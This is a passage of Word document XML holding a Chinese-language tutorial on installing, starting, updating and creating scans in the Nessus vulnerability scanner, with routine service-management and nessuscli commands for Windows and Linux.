          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46A2FE47" wp14:editId="7601D490">
            <wp:extent cx="4969510" cy="1637665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="60" name="图片 60" descr="http://static.oschina.net/uploads/space/2015/0710/145309_4rHL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oschina.net/uploads/space/2015/0710/145309_4rHL_158585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9510" cy="1637665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（9）该界面显示了Nessus工具的欢迎信息。此时，单击Continue按钮，将显示如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（10）该界面用来创建一个帐号，用户管理Nessus服务。这里创建一个名为admin的用户，并为该用户设置一个密码。设置完成后，单击Continue按钮，将显示如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F44924C" wp14:editId="44AD3C5C">
            <wp:extent cx="5343525" cy="1788795"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
            <wp:docPr id="61" name="图片 61" descr="http://static.oschina.net/uploads/space/2015/0710/145310_zyxg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oschina.net/uploads/space/2015/0710/145310_zyxg_158585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43525" cy="1788795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（11）在该界面Activation Code对应的文本框中，输入前面获取到的激活码。然后，单击Continue按钮，将开始加载Nessus中的插件，如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（12）从该界面可以看到正在下载插件，并进行初始化。此过程，大概需要十分钟的时间。当初始化完成后，将显示如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44F16B97" wp14:editId="7CB95558">
            <wp:extent cx="5274310" cy="40659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065905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（13）该界面是登录Nessus服务界面。在该界面输入的用户名和密码，就是在前面初始化过程中创建的用户和密码。输入用户名和密码后，单击Sign In按钮，即可成功登录Nessus服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示：以上过程中的Nessus服务登录界面，是自动弹出的。当用户关闭后，则需要重新登录。此时，用户在浏览器中输入https://IP:8834/或https://主机名:8834/地址，即可打开如图1.12所示的界面。然后，选择“继续浏览此网站”选项，即可打开登录页面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc499884702"/>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>配置nessus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动Nessus服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nessus服务安装后，默认是自动启动的。如果用户重启系统，获取进行其它操作时，将Nessus服务关闭的话，则再次访问必须要先启动该服务。下面将分别介绍在不同操作系统中，启动Nessus服务的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Windows下启动Nessus服务的方法如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）打开Windows系统的服务窗口。在Windows系统的启动菜单栏中单击“运行”命令，将弹出“运行”对话框，在该对话框中输入“services.msc”，然后单击“确定”按钮，将打开“服务”窗口，如下图所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D0C1AD6" wp14:editId="046E65FA">
            <wp:extent cx="5274310" cy="38512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51275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图：windows服务管理器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（3）在该界面的名称列找到“Tenable Nessus”服务，即可管理该服务，如停止、启动或重新启动等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Windows中，也可以通过命令行停止或启动Nessus服务。例如，停止Nessus服务。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\Administrator&gt;net stop "Tenable Nessus"Tenable Nessus 服务正在停止.Tenable Nessus 服务已成功停止。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从以上输出信息中，可以看到Nessus服务已成功停止。如果启动Nessus服务，执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\Administrator&gt;net start "Tenable Nessus"Tenable Nessus 服务正在启动 .Tenable Nessus 服务已经启动成功。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从以上输出信息中，可以看到Nessus服务已成功启动。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、Linux下启动Nessus服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Linux下启动Nessus服务。执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:t>hillstone@ubuntu:/mnt/myspace$ sudo service nessusd start</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Starting Nessus : . </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从以上输出信息中，可以看到Nessus服务已成功启动。如果用户不确定该服务是否启动的话，可以使用以下命令查看其状态。如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:t>root@ubuntu:~# service nessusd status</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:br/>
        <w:t xml:space="preserve">Nessus is running </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从以上输出信息中，可以看到Nessus服务正在运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nessus软件更新</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了能够使用Nessus进行一个成功的漏洞扫描，在扫描之前检查并且更新Nessus，使用最新的插件是非常重要的。这样可以保证扫描到所有最新的漏洞。下面将以Windows操作系统为例，介绍更新插件的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.在线更新</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Windows下更新Nessus中的插件。具体操作步骤如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）登录Nessus服务。在Windows中的浏览器地址栏输入https://IP:8834/地址，使用用户名和密码登陆进入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（2）在该界面单击右上角的设置（小齿轮）图标，将会弹出一个菜单栏，如下图所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A4AE065" wp14:editId="458F3B7D">
            <wp:extent cx="5263515" cy="24650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3515" cy="2465070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（5）从该界面左侧栏中，可以看到有两个子选项，即Overview（概述）和Software Update（软件更新）选项。图1.28中，显示的是Overview选项中的信息。其中，包括Nessus版本、连接时间、平台、最近更新时间、激活码等。如果要进行软件更新，则选择Software Update选项，将显示如图下图所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22E9F81D" wp14:editId="04E031E0">
            <wp:extent cx="5267325" cy="2867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F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（6）从该界面可以看到在Automatic Updates（自动更新）下面有三种更新方式，分别是Update all components（更新所有组件）、Update plugins（更新插件）和Disabled（禁止更新）。用户可以选择任何一种更新方式。而且，Nessus还提供了一种自定义插件更新方式，用于针对特定的主机。例如，更新IP地址为192.168.1.100主机提供的插件，则在Custom Host对应的文本框中输入地址192.168.1.100。如果用户不希望自动更新的话，还可以进行手动更新。在该界面单击右上角的Manual Software Update（手动更新）按钮，将显示如下图所示的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E620D7" wp14:editId="42869001">
            <wp:extent cx="5303520" cy="28346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rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（7）这里也提供了三种更新方式，分别是Update all components（更新所有组件）、Update plugins（更新插件）和Upload your own plugin archive（上传自己的插件文档）。用户选择想要的更新方式后，单击Continue按钮，即可开始更新。更新完成后，右上角（铃铛）图标处会提示更新成功。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.离线更新</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上的更新方式属于在线更新。使用这种方式更新的话，必须要确定自己的网络一直处于正常状态。如果用户不能确认自己网络的话可以使用离线更新方式。这种方式不需要Nessus系统连接必须连接到互联网。下面将介绍离线更新的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面将以Windows 7操作系统为例，介绍离线更新插件的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）获取一个激活码。由于获取的激活码，只能使用一次。所以，如果再次激活服务，需要重新获取一个激活码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（2）生成一个挑战码，执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve">D:\Program Files\Tenable\Nessus&gt; nessuscli.exe fetch --challenge </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行以上命令后，显示效果如图下图所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F4F3D2C" wp14:editId="5DEA8D69">
            <wp:extent cx="5274310" cy="12395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239520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图：生成挑战码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示：如果是在Linux系统中的话，执行命令如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve">[root@localhost ~]# /opt/nessus/sbin/nessuscli fetch --challenge </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（3）从上图中可以看到生成了一个激活码。接下来，就可以离线下载Nessus插件了。其中，下载地址为https://plugins.nessus.org/v2/offline.php。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（4）在该界面的第一行文本框中输入步骤（2）中获取到的挑战码，第二行文本框中输入获取到的激活码。然后，单击Submit按钮，即可开始下载插件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建nessus扫描</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1）软件激活后就可以开始扫描测试了，通过WEB </w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t>UI</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId208" w:history="1">
        <w:r w:rsidRPr="00917920">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>HTTPS://IP</w:t>
        </w:r>
        <w:r w:rsidRPr="00917920">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>:8834</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用用户名和密码登陆后，点击scans菜单页面中New</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>can按钮新建扫描任务，如下图所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A3FD97A" wp14:editId="4E86D91D">
            <wp:extent cx="5149884" cy="2329732"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="68" name="图片 68" descr="D:\QQ消息\408122431\Image\C2C\{UWUA~31}$ZK8`[CG80L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QQ消息\408122431\Image\C2C\{UWUA~31}$ZK8`[CG80LNPQ.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96906" cy="2351004"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2）根据需要选择所使用的扫描策略类型，这里我们选择advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2644056E" wp14:editId="1A9102E9">
            <wp:extent cx="5104737" cy="4079551"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="69" name="图片 69" descr="D:\QQ消息\408122431\Image\C2C\TN16G}A%ZZ~K@`$I(S}BU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QQ消息\408122431\Image\C2C\TN16G}A%ZZ~K@`$I(S}BUYX.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24660" cy="4095473"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3）进入到扫描任务配置页面后，先填写基本的信息，包括任务名称和扫描对象的ip地址，可以扫描多个IP地址，通过逗号分隔，家庭版一个任务最多可以扫描16个ip地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F15694" w:rsidRPr="00917920" w:rsidRDefault="00F15694" w:rsidP="00F15694">
      <w:r w:rsidRPr="00917920">
        <w:drawing>
